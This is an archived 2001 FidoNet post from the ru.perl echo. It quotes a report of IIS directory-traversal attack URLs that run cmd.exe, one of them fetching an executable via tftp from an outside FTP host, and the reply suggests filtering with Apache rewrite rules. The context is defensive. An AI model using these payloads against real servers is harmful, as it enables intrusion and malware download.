|
|
ru.perl- RU.PERL ---------------------------------------------------------------------- From : Andrey N. Demushkin 2:5020/1611.66 12 Sep 2001 21:22:04 To : Nikolay Pichtin Subject : Проверка URL -------------------------------------------------------------------------------- 08 Sep 01 22:07, you wrote to All: NP> Сейчас появляются хакеры, использующие конаструкции вида: NP> http://111.222.333.444/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63. NP> . NP> %%35%6 ./winnt/system32/cmd.exe?/c+tftp.exe+-i+ftp.os2.ru/incoming+get NP> +WINOLDAP.exe NP> 111.222.333.444/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63 NP> ../winnt /system32/cmd.exe?/c+dir+c:\ NP> А может быть есть и еще что-то похожее. NP> Hе плохо бы сделать проверку на исключение такого, особенно NP> при вводе в формах URL. хммм... к чему это письмо? Это совет? Просьба? Пожелание? p.s. если уж так оно мешает, то можно и в апаче все настроить - RewriteRule Will you be with me even if i miss another, Nikolay? ... np : Xmms is dead --- Word Processor of the Gods 1.1.4.7 * Origin: Кто-то спит под столом, ну а мы пока пьем... (2:5020/1611.66) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.perl/45923b9fa838.html, оценка из 5, голосов 10
|